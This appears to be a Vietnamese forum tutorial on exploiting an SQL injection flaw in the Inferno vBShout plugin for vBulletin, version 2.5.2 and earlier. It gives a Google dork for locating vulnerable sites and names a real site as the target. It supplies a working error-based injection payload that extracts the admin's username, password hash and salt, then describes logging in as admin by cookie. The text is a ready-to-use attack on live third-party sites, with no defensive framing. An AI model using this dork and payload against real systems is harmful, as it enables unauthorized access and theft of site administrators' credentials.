Skip to main content

[TUT] Inferno vBShout SQLI 0day <= 2.5.2

Đầu tiên vào google.vn search dork sau:
inurl:infernoshout.php?do=options&area=commands
Ra được 1 nùi site. Mình chọn site này làm Victim : http://www.cinemekan.com/infernoshout.php?do=options&area=commands
 


Ô Command Input nhập:

' and (select 1 from (select count(*),concat((select(select concat(cast(concat(username,0x3a,password,0x3a,salt) as char),0x7e)) from user where userid=1 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND ''='#
 Ô Command Output thì nhập cái gì cũng được. Sau đó nhấn Save Settings

Nó sẽ hiện ra trang DB error

Nhấn Ctrl + U trên bàn phím. Và kéo xuống dưới cùng sẽ ra 1 trang chứa thông thông user + password+ salt của nó .

Xong bây h chúng ta có thể login bằng cookie vào được tài khoản admin rùi.
tut ngắn gọn, có gì sai mong được mọi người góp ý. Chúc mọi người thành công và vui vẻ

Tut By X-T

Nguồn: VHB

Share